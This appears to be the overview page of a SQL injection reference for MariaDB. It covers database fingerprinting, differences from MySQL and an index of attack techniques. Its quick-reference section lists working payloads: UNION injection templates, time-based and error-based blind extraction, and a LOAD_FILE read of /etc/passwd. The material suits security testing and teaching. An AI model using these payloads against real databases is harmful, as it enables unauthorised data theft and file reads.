This section provides a comprehensive collection of SQL injection techniques specific to MariaDB databases. MariaDB is a community-developed fork of MySQL and shares many SQL injection techniques with its parent project, though there are notable differences in certain areas.
Detecting MariaDB
Quick methods to identify if the target database is MariaDB:
-- Version string contains "MariaDB"
SELECT VERSION()
-- Returns: '10.6.24-MariaDB-ubu2204' (contains 'MariaDB')
-- MariaDB includes 'MariaDB' in @@version_comment
SELECT @@version_comment
-- Contains 'mariadb.org' or similar
-- Check for MariaDB-specific functions
SELECT JSON_DETAILED('{"a":1}')
-- Works on MariaDB, fails on MySQL
-- PASSWORD() function exists (removed in MySQL 8.0)
SELECT PASSWORD('test')
-- Works on MariaDB, fails on MySQL 8.0+Key Differences from MySQL
While MariaDB maintains strong compatibility with MySQL, the following areas show behavioral differences relevant to SQL injection:
| Feature | MariaDB | MySQL 8.0+ |
|---|---|---|
| Default Auth Plugin | mysql_native_password | caching_sha2_password |
| Version Comments | /*!M100106 ... */ | /*!80000 ... */ |
| PASSWORD() Function | Available | Removed |
| OLD_PASSWORD() | Available | Removed |
| secure_file_priv | Often less restrictive | More restrictive |
Version Comment Syntax
-- MySQL-style version comments work in MariaDB
SELECT /*!50700 1, */ 'result' AS col
-- On MariaDB/MySQL 5.7+: SELECT 1, 'result' AS col
-- On older versions: SELECT 'result' AS col
-- Version comments can conditionally include SQL
SELECT id, username /*!50000 , email */ FROM users
-- Includes 'email' column only on 5.0+
-- Note: MariaDB's M-prefix syntax (/*!M100106 */) exists but
-- is not reliably supported across all MariaDB versionsPassword Functions
-- PASSWORD() still works in MariaDB (removed in MySQL 8.0)
SELECT PASSWORD('test')
-- Returns: '*94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29'
-- OLD_PASSWORD() still works in MariaDB
SELECT OLD_PASSWORD('test')
-- Returns: '378b243e220ca493' (16-char pre-4.1 format)MariaDB-Specific Functions
-- JSON_DETAILED (MariaDB only)
SELECT JSON_DETAILED('[1,2,3]')
-- COLUMN_JSON (MariaDB dynamic columns)
SELECT COLUMN_JSON(COLUMN_CREATE('name', 'value'))
-- DECODE_HISTOGRAM (MariaDB statistics)
SELECT DECODE_HISTOGRAM(hist_type, histogram)
FROM mysql.column_stats LIMIT 1Basics
Fundamental concepts and techniques for MariaDB injection:
- Comment Out Query - Using MariaDB comment syntax to modify queries
- Testing Injection - Methods to verify if a MariaDB injection point exists
- Constants - Working with MariaDB constants in injection scenarios
- Operators - Leveraging MariaDB operators for injection
- Default Databases - Understanding and targeting MariaDB’s default databases
Information Gathering
Techniques to extract information from MariaDB databases:
- Testing Version - Methods to determine MariaDB version
- Database Names - Retrieving available database names
- Server Hostname - Obtaining the MariaDB server hostname
- Server MAC Address - Extracting MAC address information
- Tables and Columns - Discovering table and column names
- Database Credentials - Techniques to extract MariaDB credentials
Injection Techniques
Advanced methods for exploiting MariaDB injection vulnerabilities:
- Avoiding Quotations - Bypassing quote filters
- String Concatenation - Techniques to concatenate strings in MariaDB
- Conditional Statements - Using IF and CASE statements for advanced injections
- Stacked Queries - Executing multiple statements in one injection
- MariaDB-Specific Code - Exploiting unique MariaDB functions and features
- Timing - Time-based blind injection methods
- Fuzzing/Obfuscation - Techniques to bypass WAFs and filters
Advanced Techniques
Sophisticated attacks for extracting data and gaining system access:
- Privileges - Determining and exploiting user privileges
- Reading Files - Techniques to read files from the server filesystem
- Writing Files - Methods to write files to the server
- Out-of-Band Channeling - Extracting data via alternative channels
- Password Hashing - Understanding and exploiting MariaDB password storage
- Password Cracking - Techniques to recover passwords from hashes
Quick Reference
Common one-liners for MariaDB SQL injection:
-- Get version
SELECT VERSION()
SELECT @@version
-- Get current user
SELECT USER()
SELECT CURRENT_USER()
-- Get current database
SELECT DATABASE()
-- List all databases
SELECT schema_name FROM information_schema.schemata
-- List tables in current database
SELECT table_name FROM information_schema.tables WHERE table_schema = DATABASE()
-- List columns in a table
SELECT column_name FROM information_schema.columns WHERE table_name = 'users'
-- Read file (requires FILE privilege)
SELECT LOAD_FILE('/etc/passwd')
-- Time-based blind injection
SELECT IF(1=1, SLEEP(5), 0)
SELECT BENCHMARK(10000000, SHA1('test'))
-- Error-based injection
SELECT EXTRACTVALUE(1, CONCAT(0x7e, VERSION()))
SELECT UPDATEXML(1, CONCAT(0x7e, VERSION()), 1)
-- UNION injection template
' UNION SELECT 1,2,3,4 -- -
' UNION SELECT NULL,NULL,NULL,NULL -- -Browse the techniques using the sidebar navigation or select a specific category to explore.